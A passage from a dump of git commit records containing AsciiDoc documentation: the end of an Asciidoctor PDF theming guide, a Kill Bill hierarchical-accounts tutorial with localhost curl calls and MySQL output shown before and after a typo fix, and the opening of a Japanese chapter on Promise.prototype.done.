bold_italic\n|font_style: italic\n\n|header_height\n|<<measurement-units,measurement>>\n|height: 0.75in\n\n|header_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|padding: [0, 3, 0, 3]\n\n|header_image_valign\n|top, center, bottom, <<measurement-units,measurement>>\n|image_valign: 4\n\n|header_valign\n|top, center, bottom\n|valign: center\n\n|header_<side>_content_<align>*\n|quoted string\nv|`recto_content:\n right: '\\{page-number}'`\n\n|footer_background_color\n|<<colors,color>>\n|background_color: EEEEEE\n\n|footer_border_color\n|<<colors,color>>\n|border_color: DDDDDD\n\n|footer_border_width\n|<<measurement-units,measurement>>\n|border_width: 0.25\n\n|footer_font_color\n|<<colors,color>>\n|font_color: 333333\n\n|footer_font_family\n|<<fonts,font family name>>\n|font_family: NotoSerif\n\n|footer_font_size\n|<<values,number>>\n|font_size: 9\n\n|footer_font_style\n|normal, italic, bold, bold_italic\n|font_style: italic\n\n|footer_height\n|<<measurement-units,measurement>>\n|height: 0.75in\n\n|footer_padding\n|<<measurement-units,measurement>>, <<measurement-units,measurement array [4]>>\n|padding: [0, 3, 0, 3]\n\n|footer_image_valign\n|top, center, bottom, <<measurement-units,measurement>>\n|image_valign: 4\n\n|footer_valign\n|top, center, bottom\n|valign: top\n\n|footer_<side>_content_<align>*\n|quoted string\nv|`recto_content:\n center: '\\{page-number}'`\n|===\n\n{asterisk} `<side>` can be `recto` (odd pages) or `verso` (even pages).\n`<align>` can be `left`, `center` or `right`.\n\nIMPORTANT: You must define a height for the running header or footer, respectively, or it will not be shown.\n\nNOTE: The background color spans the width of the page.\nWhen a background color is specified, the border also spans the width of the page.\n\nIn addition to the document-level attributes defined in the AsciiDoc document, the following attributes are available when defining the content keys in the footer:\n\n* page-count\n* page-number\n* document-title\n* document-subtitle\n* chapter-title\n* section-title\n* section-or-chapter-title\n\nFor example:\n\n[source,yaml]\n----\nfooter:\n height: 0.75in\n recto_content:\n right: '{section-or-chapter-title} | {page-number}'\n verso_content:\n left: '{page-number} | {chapter-title}'\n----\n\n== Applying your theme\n\nAfter creating a theme, you'll need to tell Asciidoctor PDF where to find it.\nThis is done using AsciiDoc attributes.\n\nThere are three AsciiDoc attributes that tell Asciidoctor PDF how to locate and apply your theme.\n\npdf-stylesdir:: The directory where the theme file is located.\n_Specifying an absolute path is recommended._\n\npdf-style:: The name of the YAML theme file to load.\nIf the name ends with `.yml`, it's assumed to be the complete name of a file.\nOtherwise, `-theme.yml` is appended to the name to make the file name (i.e., `<name>-theme.yml`).\n\npdf-fontsdir:: The directory where the fonts used by your theme, if any, are located.\n_Specifying an absolute path is recommended._\n\nLet's assume that you've put your theme files inside a directory named `resources` with the following layout:\n\n....\ndocument.adoc\nresources\/\n themes\/\n basic-theme.yml\n fonts\/\n roboto-normal.ttf\n roboto-italic.ttf\n roboto-bold.ttf\n roboto-bold_italic.ttf\n....\n\nHere's how you'd load your theme when calling Asciidoctor PDF:\n\n $ asciidoctor-pdf -a pdf-stylesdir=resources\/themes -a pdf-style=basic -a pdf-fontsdir=resources\/fonts\n\nIf all goes well, Asciidoctor PDF should run without an error or warning.\n\nNOTE: You only need to specify the `pdf-fontsdir` if you are using custom fonts in your theme.\n\nAlternatively, you can skip setting the `pdf-stylesdir` attribute and just pass the absolute path of your theme file to the `pdf-style` attribute.\n\n $ asciidoctor-pdf -a pdf-style=resources\/themes\/basic-theme.yml -a pdf-fontsdir=resources\/fonts\n\nPaths are resolved relative to the current directory.\nHowever, in the future, this may be changed so that paths are resolved relative to the base directory (typically the document's directory).\nTherefore, it's recommend that you specify absolute paths for now to future-proof your configuration.\n\nIf you use images in your theme, the image paths are resolved relative to the theme file.\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"26b7b075bc7a0ccffabd29b171078c0053a82292","subject":"Update ha.adoc","message":"Update ha.adoc\n\nFix typos for ha.adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/ha.adoc","new_file":"userguide\/tutorials\/ha.adoc","new_contents":"= Hierarchical Accounts Tutorial\n\n== Overview\n\nStarting with Kill Bill 0.18.x, we have introduced support of HA (Hierarchical Accounts), and so in this tutorial we will review first what the feature is about, and then explore how it works and which apis to use.\n\nLet's review first what we have prior to introducing the HA feature: In the Kill Bill terminology, a customer will be represented as a Kill Bill `Account`, and such `Account` will then be invoiced based on its current subscriptions and one-off charges. Payments will also be made by using the default payment method associated with the `Account`.\n\nThe idea with the HA feature is to delegate some of the payment operations associated to an `Account` to a `parent Account`. Some typical use case for the feature are:\n\n* Affiliate model: In the affiliate model, payments associated to some customers are made through the `parent Account` but each individual `Account` will manage its own subscriptions and will have access to the associated invoices.\n* Sub-Organization: In large organizations, it is common to see sub organizations that work independently, and yet parent organization is responsible for the payments.\n\nThe new HA feature allows for the following:\n\n* Ability to set an `Account` as the child of another `Account`\n* Ability to specify on an `Account` that it will be responsible for paying its own invoice (current behaviour)\n* Ability to specify on an `Account` that the parent will be responsible for the payments\n* Ability to transfer credit from child 'Account' to parent 'Account'\n* Ability to list all children `Account`\n\n== How does it work?\n\nThe Kill Bill `Account` abstraction has been enhanced to allow specifying a parent `Account` and whether or not that parent `Account` is responsible to pay children's invoices. A parent `Account` is an `Account` that contains one or more children `Account`. When such a parent `Account` exists and when its children have been configured to delegate their payments, the following happens:\n\n1. Every time the system computes a new invoice (or adjusts an existing one) for a given child `Account`, the parent gets notified and also computes a special summary invoice that will include all the items for all the children on a given day.\n2. The payment system will ignore the child invoice as it knows this should be paid by the parent.\n3. At the end of each day (UTC time), the summary invoice will transition from `DRAFT` to `COMMITTED`\n4. As a result, the payment system will attempt to make a payment for the parent summary invoice using the default payment method associated to the parent `Account`.\n\nAs we can see, each child `Account` can still have its own subscriptions and matching invoices, but associated payments are delegated to the parent through the daily computation of a summary invoice.\n\nThe balance associated with both the child invoice and parent summary invoice will be zero until the end of the day when the transition from `DRAFT` to `COMMITTED` occurs. At this point, if the payment succeeds, then such invoice balances remain to zero. If not, then each invoice balance (child and parent) becomes equal to its invoice amount.\n\nIn terms of dunning (overdue), since parent `Account` are the one making the payments, then overdue system will compute dunning state based on the per-tenant overdue configuration and parent `Account` 's payment state. The children `Account` will inherit the same dunning state as their parent. As a result one unpaid parent invoice that did not contain any invoice item for a given child would still put this child in an overdue state.\n\n\n== Tutorial\n\nLet's create a child `Account` associated to one parent `Account` to see what happens (we assume the defauly demo bob\/lazar tenant already exists):\n\n\nLet's create first the parent `Account` (we can see its ID in the `Location` header that is being returned) and also add a default payment method:\n\n[source,bash]\n----\ncurl -v \\\n -u admin:password \\\n -H \"X-Killbill-ApiKey: bob\" \\\n -H \"X-Killbill-ApiSecret: lazar\" \\\n -H \"Content-Type: application\/json\" \\\n -H \"X-Killbill-CreatedBy: demo\" \\\n -X POST \\\n --data-binary '{\"name\":\"Parent\",\"email\":\"parent@example.com\",\"currency\":\"USD\"}' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\"\n\n< Location: http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\/09d5dfdf-eff2-4b45-96d8-535ea269178e\n\ncurl -v \\\n -u admin:password \\\n -H \"X-Killbill-ApiKey: bob\" \\\n -H \"X-Killbill-ApiSecret: lazar\" \\\n -H \"Content-Type: application\/json\" \\\n -H \"X-Killbill-CreatedBy: demo\" \\\n -X POST \\\n --data-binary '{\"pluginName\":\"__EXTERNAL_PAYMENT__\",\"pluginInfo\":{}}' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\/09d5dfdf-eff2-4b45-96d8-535ea269178e\/paymentMethods?isDefault=true\"\n----\n\nLet's now create the child `Account` (notice the new fields `parentAccountId` and `isPaymentDelegatedToParent` in the json):\n\n[source,bash]\n----\ncurl -v \\\n -u admin:password \\\n -H \"X-Killbill-ApiKey: bob\" \\\n -H \"X-Killbill-ApiSecret: lazar\" \\\n -H \"Content-Type: application\/json\" \\\n -H \"X-Killbill-CreatedBy: demo\" \\\n -X POST \\\n --data-binary '{\"name\":\"C1\",\"email\":\"c1@example.com\",\"currency\":\"USD\",\"parentAccountId\":\"09d5dfdf-eff2-4b45-96d8-535ea269178e\", \"isPaymentDelegatedToParent\":true}' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\"\n\n< Location: http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\/ea58b7dd-eb23-4065-a3e5-980291d45ab8\n----\n\n\nLet's now create a subscription for the child `Account` (we'll use a simple monthly plan with no trial called `zoo-monthly`):\n\n[source,bash]\n----\ncurl -v \\\n -u admin:password \\\n -H \"X-Killbill-ApiKey: bob\" \\\n -H \"X-Killbill-ApiSecret: lazar\" \\\n -H \"Content-Type: application\/json\" \\\n -H \"X-Killbill-CreatedBy: demo\" \\\n -X POST \\\n --data-binary '{\"accountId\":\"ea58b7dd-eb23-4065-a3e5-980291d45ab8\",\"externalKey\":\"s1\",\"planName\":\"zoo-monthly\"}' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/subscriptions\"\n----\n\n\nIf we inspect our DB entries, we see that there is a COMMITTED invoice for the child and a DRAFT invoice for the parent:\n\n\n[source,bash]\n----\nmysql> select * from invoices where account_id = 'ea58b7dd-eb23-4065-a3e5-980291d45ab8'\\G\n*************************** 1. row ***************************\n record_id: 45545\n id: 742c700d-e957-4948-a0bb-b16c0e4a4ecb\n account_id: ea58b7dd-eb23-4065-a3e5-980291d45ab8\n invoice_date: 2016-12-09\n target_date: 2016-12-09\n currency: USD\n status: COMMITTED\n migrated: 0\n parent_invoice: 0\n created_by: SubscriptionBaseTransition\n created_date: 2016-12-09 21:11:12\naccount_record_id: 6750\n tenant_record_id: 338\n1 row in set (0.00 sec)\n\nmysql> select * from invoices where account_id = '09d5dfdf-eff2-4b45-96d8-535ea269178e'\\G\n*************************** 1. row ***************************\n record_id: 45546\n id: 5a056e57-1089-4d15-a2b2-27df996dfbb1\n account_id: 09d5dfdf-eff2-4b45-96d8-535ea269178e\n invoice_date: 2016-12-09\n target_date: NULL\n currency: USD\n status: DRAFT\n migrated: 0\n parent_invoice: 1\n created_by: CreateParentInvoice\n created_date: 2016-12-09 21:11:13\naccount_record_id: 6749\n tenant_record_id: 338\n1 row in set (0.00 sec)\n----\n\nLet's now move the clock to the end of the day to trigger the transition from `DRAFT` to `COMMITTED`:\n\n[source,bash]\n----\ncurl -v \\\n -X POST \\\n -u admin:password \\\n -H \"X-Killbill-ApiKey: bob\" \\\n -H \"X-Killbill-ApiSecret: lazar\" \\\n -H \"Content-Type: application\/json\" \\\n -H \"X-Killbill-CreatedBy: demo\" \\\n 'http:\/\/127.0.0.1:8080\/1.0\/kb\/test\/clock?requestedDate=2016-12-10'\n----\n\nLet's look again at the parent invoice (and also the item it contains):\n\n[source,bash]\n----\nmysql> select * from invoices where account_id = '09d5dfdf-eff2-4b45-96d8-535ea269178e'\\G\n*************************** 1. row ***************************\n record_id: 45546\n id: 5a056e57-1089-4d15-a2b2-27df996dfbb1\n account_id: 09d5dfdf-eff2-4b45-96d8-535ea269178e\n invoice_date: 2016-12-09\n target_date: NULL\n currency: USD\n status: COMMITTED\n migrated: 0\n parent_invoice: 1\n created_by: CreateParentInvoice\n created_date: 2016-12-09 21:11:13\naccount_record_id: 6749\n tenant_record_id: 338\n1 row in set (0.00 sec)\n\n> select * from invoice_items where invoice_id = '5a056e57-1089-4d15-a2b2-27df996dfbb1'\\G\n*************************** 1. row ***************************\n record_id: 59901\n id: bed7bd0d-4557-435c-9208-f09ef08d36c3\n type: PARENT_SUMMARY\n invoice_id: 5a056e57-1089-4d15-a2b2-27df996dfbb1\n account_id: 09d5dfdf-eff2-4b45-96d8-535ea269178e\n child_account_id: ea58b7dd-eb23-4065-a3e5-980291d45ab8\n bundle_id: NULL\n subscription_id: NULL\n description: ea58b7dd-eb23-4065-a3e5-980291d45ab8 summary\n plan_name: NULL\n phase_name: NULL\n usage_name: NULL\n start_date: NULL\n end_date: NULL\n amount: 34.000000000\n rate: NULL\n currency: USD\n linked_item_id: NULL\n created_by: CreateParentInvoice\n created_date: 2016-12-09 21:11:13\naccount_record_id: 6749\n tenant_record_id: 338\n----\n\n\nWe can see that the parent invoice contains only one `PARENT_SUMMARY` item and that its state is now `COMMITTED` as expected.\n\nLet's now verify what happens on the payment side:\n\n[source,bash]\n----\n mysql> select * from payments where account_id = '09d5dfdf-eff2-4b45-96d8-535ea269178e'\\G\n *************************** 1. row ***************************\n record_id: 17634\n id: b75a7646-091d-471c-824c-4cef375de714\n account_id: 09d5dfdf-eff2-4b45-96d8-535ea269178e\n payment_method_id: 857aea5d-9c55-475b-8094-7746e96448de\n external_key: e9f07f58-4332-44ee-8c4a-05c89395a308\n state_name: PURCHASE_SUCCESS\n last_success_state_name: PURCHASE_SUCCESS\n created_by: PaymentRequestProcessor\n created_date: 2016-12-10 00:00:00\n updated_by: PaymentRequestProcessor\n updated_date: 2016-12-10 00:00:00\n account_record_id: 6749\n tenant_record_id: 338\n 1 row in set (0.00 sec)\n\n mysql> \n mysql> select * from payments where account_id = 'ea58b7dd-eb23-4065-a3e5-980291d45ab8'\\G\n Empty set (0.01 sec)\n \n----\n\n\nAs expected we see one payment for the parent invoice and no payment for the child.\n\n== Conclusion\n\nThere is a lot more to demo (regarding dunning, invoice adjustment, ...), but this should provide a highlight of what the feature is about. Note that this is a new feature in 0.18 and as such it should be seen as Beta (you are responsible to verify it works accordingly to your use case, load, ...).\n\nIn the future, we may want to add the ability to unparent children (feature is not supported yet).\n\n","old_contents":"= Hierarchical Accounts Tutorial\n\n== Overview\n\nStarting with Kill Bill 0.18.x, we have introduced support of HA (Hierarchical Accounts), and so in this tutorial we will review first what the feature is about, and then explore how it works and which apis to use.\n\nLet's review first what we have prior to introducing the HA feature. In the Kill Bill terminology, a customer will be represented a Kill Bill `Account`, and such `Account` will then be invoiced based on its current subscriptions and one-off charges. Payments will also be made by using the default payment method associated with the `Account`.\n\nThe idea with the HA feature is to delegate some of the payment operations associated to an `Account` to a `parent Account`. Some typical use case for the feature are:\n* Affiliate model: In the affiliate models, payment associated to some customers are made through the `parent Account` but each individual `Account` will manage its own subscriptions and will have access to the associated invoices.\n* Sub-Organization; In large organizations, it is common to see sub organizations that work independently, and yet parent organization is responsible for the payments.\n\nThe new HA feature allows for the following:\n* Ability to set an `Account` as the child of another `Account`\n* Ability to specify on an `Account` that it will be responsible for paying its own invoice (current behaviour)\n* Ability to specify on an `Account` that the parent will be responsible for the payments\n* Ability to transfer credit from child 'Account' to parent 'Account'\n* Ability to list all children `Account`\n\n== How does it work?\n\nThe Kill Bill `Account` abstraction has been enhanced to allow specifying a parent `Account` and whether or not that parent `Account` is responsible to pay children's invoices. A parent `Account` is an `Account` that contains one or more children `Account`. When such a parent `Account` exists and when its children have been configured to delegate their payments, the following happens:\n\n1. Every time the system computes a new invoice (or adjusts an existing one) for a given child `Account`, the parent gets notified and also computes a special summary invoice that will include all the items for all the children on a given day.\n2. The payment system will ignore the child invoice as it knows this should be paid by the parent.\n3. At the end of each day (UTC time), the summary invoice will transition from `DRAFT` to `COMMITTED`\n4. As a result, the payment system will attempt to make a payment for the parent summary invoice using the default payment method associated to the parent `Account`.\n\nAs we can see, each child `Account` can still have its own subscriptions and matching invoices, but associated payments are delegated to the parent through the daily computation of a summary invoice.\n\nThe balance associated with both the child invoice and parent summary invoice will be zero until the end of the day when the transition from `DRAFT` to `COMMITTED` occurs. At this point, if the payment succeeds, then such invoice balances remain to zero. If not, then each invoice balance (child and parent) becomes equal to its invoice amount.\n\nIn terms of dunning (overdue), since parent `Account` are the one making the payments, then overdue system will compute dunning state based on the per-tenant overdue configuration and parent `Account` 's payment state. The children `Account` will inherit the same dunning state as their parent. As a result one unpaid parent invoice that did not contain any invoice item for a given child would still put this child in an overdue state.\n\n\n== Tutorial\n\nLet's create a child `Account` associated to one parent `Account` to see what happens (we assume the defauly demo bob\/lazar tenant already exists):\n\n\nLet's create first the parent `Account` (we can see its ID in the `Location` header that is being returned) and also add a default payment method:\n\n[source,bash]\n----\ncurl -v \\\n -u admin:password \\\n -H \"X-Killbill-ApiKey: bob\" \\\n -H \"X-Killbill-ApiSecret: lazar\" \\\n -H \"Content-Type: application\/json\" \\\n -H \"X-Killbill-CreatedBy: demo\" \\\n -X POST \\\n --data-binary '{\"name\":\"Parent\",\"email\":\"parent@example.com\",\"currency\":\"USD\"}' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\"\n\n< Location: http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\/09d5dfdf-eff2-4b45-96d8-535ea269178e\n\ncurl -v \\\n -u admin:password \\\n -H \"X-Killbill-ApiKey: bob\" \\\n -H \"X-Killbill-ApiSecret: lazar\" \\\n -H \"Content-Type: application\/json\" \\\n -H \"X-Killbill-CreatedBy: demo\" \\\n -X POST \\\n --data-binary '{\"pluginName\":\"__EXTERNAL_PAYMENT__\",\"pluginInfo\":{}}' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\/09d5dfdf-eff2-4b45-96d8-535ea269178e\/paymentMethods?isDefault=true\"\n----\n\nLet's now create the child `Account` (notice the new fields `parentAccountId` and `isPaymentDelegatedToParent` in the json):\n\n[source,bash]\n----\ncurl -v \\\n -u admin:password \\\n -H \"X-Killbill-ApiKey: bob\" \\\n -H \"X-Killbill-ApiSecret: lazar\" \\\n -H \"Content-Type: application\/json\" \\\n -H \"X-Killbill-CreatedBy: demo\" \\\n -X POST \\\n --data-binary '{\"name\":\"C1\",\"email\":\"c1@example.com\",\"currency\":\"USD\",\"parentAccountId\":\"09d5dfdf-eff2-4b45-96d8-535ea269178e\", \"isPaymentDelegatedToParent\":true}' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\"\n\n< Location: http:\/\/127.0.0.1:8080\/1.0\/kb\/accounts\/ea58b7dd-eb23-4065-a3e5-980291d45ab8\n----\n\n\nLet's now create a subscription for the child `Account` (we'll use a simple monthly plan with no trial called `zoo-monthly`):\n\n[source,bash]\n----\ncurl -v \\\n -u admin:password \\\n -H \"X-Killbill-ApiKey: bob\" \\\n -H \"X-Killbill-ApiSecret: lazar\" \\\n -H \"Content-Type: application\/json\" \\\n -H \"X-Killbill-CreatedBy: demo\" \\\n -X POST \\\n --data-binary '{\"accountId\":\"ea58b7dd-eb23-4065-a3e5-980291d45ab8\",\"externalKey\":\"s1\",\"planName\":\"zoo-monthly\"}' \\\n \"http:\/\/127.0.0.1:8080\/1.0\/kb\/subscriptions\"\n----\n\n\nIf we inspect our DB entries, we see that there a COMMITTED invoice for the child and a DRAFT invoice for the parent:\n\n\n[source,bash]\n----\nmysql> select * from invoices where account_id = 'ea58b7dd-eb23-4065-a3e5-980291d45ab8'\\G\n*************************** 1. row ***************************\n record_id: 45545\n id: 742c700d-e957-4948-a0bb-b16c0e4a4ecb\n account_id: ea58b7dd-eb23-4065-a3e5-980291d45ab8\n invoice_date: 2016-12-09\n target_date: 2016-12-09\n currency: USD\n status: COMMITTED\n migrated: 0\n parent_invoice: 0\n created_by: SubscriptionBaseTransition\n created_date: 2016-12-09 21:11:12\naccount_record_id: 6750\n tenant_record_id: 338\n1 row in set (0.00 sec)\n\nmysql> select * from invoices where account_id = '09d5dfdf-eff2-4b45-96d8-535ea269178e'\\G\n*************************** 1. row ***************************\n record_id: 45546\n id: 5a056e57-1089-4d15-a2b2-27df996dfbb1\n account_id: 09d5dfdf-eff2-4b45-96d8-535ea269178e\n invoice_date: 2016-12-09\n target_date: NULL\n currency: USD\n status: DRAFT\n migrated: 0\n parent_invoice: 1\n created_by: CreateParentInvoice\n created_date: 2016-12-09 21:11:13\naccount_record_id: 6749\n tenant_record_id: 338\n1 row in set (0.00 sec)\n----\n\nLet's now move the clock to the end of the day to trigger the transition from `DRAFT` to `COMMITTED`:\n\n[source,bash]\n----\ncurl -v \\\n -X POST \\\n -u admin:password \\\n -H \"X-Killbill-ApiKey: bob\" \\\n -H \"X-Killbill-ApiSecret: lazar\" \\\n -H \"Content-Type: application\/json\" \\\n -H \"X-Killbill-CreatedBy: demo\" \\\n 'http:\/\/127.0.0.1:8080\/1.0\/kb\/test\/clock?requestedDate=2016-12-10'\n----\n\nLet's look again at the parent invoice (and also the item it contains):\n\n[source,bash]\n----\nmysql> select * from invoices where account_id = '09d5dfdf-eff2-4b45-96d8-535ea269178e'\\G\n*************************** 1. row ***************************\n record_id: 45546\n id: 5a056e57-1089-4d15-a2b2-27df996dfbb1\n account_id: 09d5dfdf-eff2-4b45-96d8-535ea269178e\n invoice_date: 2016-12-09\n target_date: NULL\n currency: USD\n status: COMMITTED\n migrated: 0\n parent_invoice: 1\n created_by: CreateParentInvoice\n created_date: 2016-12-09 21:11:13\naccount_record_id: 6749\n tenant_record_id: 338\n1 row in set (0.00 sec)\n\n> select * from invoice_items where invoice_id = '5a056e57-1089-4d15-a2b2-27df996dfbb1'\\G\n*************************** 1. row ***************************\n record_id: 59901\n id: bed7bd0d-4557-435c-9208-f09ef08d36c3\n type: PARENT_SUMMARY\n invoice_id: 5a056e57-1089-4d15-a2b2-27df996dfbb1\n account_id: 09d5dfdf-eff2-4b45-96d8-535ea269178e\n child_account_id: ea58b7dd-eb23-4065-a3e5-980291d45ab8\n bundle_id: NULL\n subscription_id: NULL\n description: ea58b7dd-eb23-4065-a3e5-980291d45ab8 summary\n plan_name: NULL\n phase_name: NULL\n usage_name: NULL\n start_date: NULL\n end_date: NULL\n amount: 34.000000000\n rate: NULL\n currency: USD\n linked_item_id: NULL\n created_by: CreateParentInvoice\n created_date: 2016-12-09 21:11:13\naccount_record_id: 6749\n tenant_record_id: 338\n----\n\n\nWe can see that the parent invoice contains only one `PARENT_SUMMARY` item and that its state is now `COMMITTED` as expected.\n\nLet's now verify what happens on the payment side:\n\n[source,bash]\n----\n mysql> select * from payments where account_id = '09d5dfdf-eff2-4b45-96d8-535ea269178e'\\G\n *************************** 1. row ***************************\n record_id: 17634\n id: b75a7646-091d-471c-824c-4cef375de714\n account_id: 09d5dfdf-eff2-4b45-96d8-535ea269178e\n payment_method_id: 857aea5d-9c55-475b-8094-7746e96448de\n external_key: e9f07f58-4332-44ee-8c4a-05c89395a308\n state_name: PURCHASE_SUCCESS\n last_success_state_name: PURCHASE_SUCCESS\n created_by: PaymentRequestProcessor\n created_date: 2016-12-10 00:00:00\n updated_by: PaymentRequestProcessor\n updated_date: 2016-12-10 00:00:00\n account_record_id: 6749\n tenant_record_id: 338\n 1 row in set (0.00 sec)\n\n mysql> \n mysql> select * from payments where account_id = 'ea58b7dd-eb23-4065-a3e5-980291d45ab8'\\G\n Empty set (0.01 sec)\n \n----\n\n\nAs expected we see one paument for the parent invoice and no payment for the child.\n\n== Conclusion\n\nThere is a lot more to demo (regarding dunning, invoice adjsutment, ...), but this should provide a highlight of what the feature is about. Note that this is a new feature in 0.18 and as such it should be seen as a Beta (you are responsible to verify it works accordingly to your use case, load, ...).\n\nIn the future, we may want to add the ability to unparent children (feature is not supported yet).\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"45931ce290b315d7afa2666bd72d5a70e63a0dec","subject":"chore(promise-done): s\/\u3067\/\u3067\u306e\/","message":"chore(promise-done): s\/\u3067\/\u3067\u306e\/\n","repos":"azu\/promises-book,azu\/promises-book,wenber\/promises-book,cqricky\/promises-book,dieface\/promises-book,cqricky\/promises-book,liyunsheng\/promises-book,xifeiwu\/promises-book,dieface\/promises-book,liyunsheng\/promises-book,dieface\/promises-book,genie88\/promises-book,azu\/promises-book,wenber\/promises-book,mzbac\/promises-book,tangjinzhou\/promises-book,sunfurong\/promise,charlenopires\/promises-book,xifeiwu\/promises-book,wenber\/promises-book,mzbac\/promises-book,sunfurong\/promise,purepennons\/promises-book,xifeiwu\/promises-book,wangwei1237\/promises-book,lidasong2014\/promises-book,lidasong2014\/promises-book,sunfurong\/promise,liyunsheng\/promises-book,azu\/promises-book,oToUC\/promises-book,liubin\/promises-book,wangwei1237\/promises-book,lidasong2014\/promises-book,charlenopires\/promises-book,oToUC\/promises-book,tangjinzhou\/promises-book,liubin\/promises-book,tangjinzhou\/promises-book,purepennons\/promises-book,wangwei1237\/promises-book,oToUC\/promises-book,mzbac\/promises-book,genie88\/promises-book,charlenopires\/promises-book,liubin\/promises-book,genie88\/promises-book,purepennons\/promises-book,cqricky\/promises-book","old_file":"Ch4_AdvancedPromises\/promise-done.adoc","new_file":"Ch4_AdvancedPromises\/promise-done.adoc","new_contents":"[[promise-done]]\n== Promise.prototype.done \u3068\u306f\u4f55\u304b?\n\n\u65e2\u5b58\u306ePromise\u5b9f\u88c5\u30e9\u30a4\u30d6\u30e9\u30ea\u3092\u5229\u7528\u3057\u305f\u3053\u3068\u304c\u3042\u308b\u4eba\u306f\u3001\n`then` \u306e\u4ee3\u308f\u308a\u306b\u4f7f\u3046 `done` \u3068\u3044\u3046\u30e1\u30bd\u30c3\u30c9\u3092\u898b\u305f\u3053\u3068\u304c\u3042\u308b\u304b\u3082\u3057\u308c\u307e\u305b\u3093\u3002\n\n\u305d\u308c\u3089\u306e\u30e9\u30a4\u30d6\u30e9\u30ea\u3067\u306f `Promise.prototype.done` \u3068\u3044\u3046\u3088\u3046\u306a\u5b9f\u88c5\u304c\u5b58\u5728\u3057\u3001\n\u4f7f\u3044\u65b9\u306f`then`\u3068\u540c\u3058\u3067\u3059\u304c\u3001promise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u8fd4\u3055\u306a\u3044\u3088\u3046\u306b\u306a\u3063\u3066\u3044\u307e\u3059\u3002\n\n`Promise.prototype.done` \u306f\u3001<<es6-promises,ES6 Promises>>\u3084<<promises-aplus,Promises\/A+>>\u306e\u4ed5\u69d8\u306b\u306f\n\u5b58\u5728\u3057\u3066\u3044\u306a\u3044\u8a18\u8ff0\u3067\u3059\u304c\u3001\u591a\u304f\u306e\u30e9\u30a4\u30d6\u30e9\u30ea\u304c\u5b9f\u88c5\u3057\u3066\u3044\u307e\u3059\u3002\n\n\u3053\u306e\u30bb\u30af\u30b7\u30e7\u30f3\u3067\u306f\u3001`Promise.prototype.done`\u3068\u306f\u4f55\u304b?\n\u307e\u305f\u4f55\u6545\u3053\u306e\u3088\u3046\u306a\u30e1\u30bd\u30c3\u30c9\u304c\u591a\u304f\u306e\u30e9\u30a4\u30d6\u30e9\u30ea\u3067\u5b9f\u88c5\u3055\u308c\u3066\u3044\u308b\u304b\u306b\u3064\u3044\u3066\u5b66\u3093\u3067\u3044\u304d\u307e\u3057\u3087\u3046\u3002\n\n=== done\u3092\u4f7f\u3063\u305f\u30b3\u30fc\u30c9\u4f8b\n\n\u5b9f\u969b\u306bdone\u3092\u4f7f\u3063\u305f\u30b3\u30fc\u30c9\u3092\u898b\u3066\u307f\u308b\u3068`done`\u306e\u6319\u52d5\u304c\u5206\u304b\u308a\u3084\u3059\u3044\u3068\u601d\u3044\u307e\u3059\u3002\n\n[source,js]\n[[promise-done-example.js]]\n.promise-done-example.js\n----\ninclude::embed\/embed-promise-done-example.js[]\n----\n\n\u6700\u521d\u306b\u8ff0\u3079\u305f\u3088\u3046\u306b\u3001`Promise.prototype.done`\u306f\u4ed5\u69d8\u3068\u3057\u3066\u306f\u5b58\u5728\u3057\u306a\u3044\u305f\u3081\u3001\n\u5229\u7528\u3059\u308b\u969b\u306f\u5b9f\u88c5\u3055\u308c\u3066\u3044\u308b\u30e9\u30a4\u30d6\u30e9\u30ea\u3092\u4f7f\u3046\u304b\u81ea\u5206\u3067\u5b9f\u88c5\u3059\u308b\u5fc5\u8981\u304c\u3042\u308a\u307e\u3059\u3002\n\n\u5b9f\u88c5\u306b\u3064\u3044\u3066\u306f\u5f8c\u3067\u89e3\u8aac\u3057\u307e\u3059\u304c\u3001\u307e\u305a\u306f`then`\u3092\u4f7f\u3063\u305f\u5834\u5408\u3068`done`\u3092\u4f7f\u3063\u305f\u3082\u306e\u3092\u6bd4\u8f03\u3057\u3066\u307f\u307e\u3059\u3002\n\n[source,js]\n.then\u3092\u4f7f\u3063\u305f\u5834\u5408\n----\nvar promise = Promise.resolve();\npromise.then(function () {\n JSON.parse(\"this is not json\");\n}).catch(function (error) {\n console.error(error);\/\/ => \"SyntaxError: JSON.parse: unexpected keyword at line 1 column 1 of the JSON data\"\n});\n----\n\n\n\u6bd4\u3079\u3066\u898b\u308b\u3068\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u9055\u3044\u304c\u3042\u308b\u3053\u3068\u304c\u5206\u304b\u308a\u307e\u3059\u3002\n\n* `done` \u306fpromise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u8fd4\u3055\u306a\u3044\n** \u3064\u307e\u308a\u3001done\u306e\u5f8c\u306b`catch`\u7b49\u306e\u30e1\u30bd\u30c3\u30c9\u30c1\u30a7\u30fc\u30f3\u306f\u3067\u304d\u306a\u3044\n* `done` \u306e\u4e2d\u3067\u767a\u751f\u3057\u305f\u30a8\u30e9\u30fc\u306f\u305d\u306e\u307e\u307e\u5916\u306b\u4f8b\u5916\u3068\u3057\u3066\u6295\u3052\u3089\u308c\u308b\n** \u3064\u307e\u308a\u3001Promise\u306b\u3088\u308b\u30a8\u30e9\u30fc\u30cf\u30f3\u30c9\u30ea\u30f3\u30b0\u304c\u884c\u308f\u308c\u306a\u3044\n\n`done` \u306fpromise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092\u8fd4\u3057\u3066\u3044\u306a\u3044\u306e\u3067\u3001\nPromise 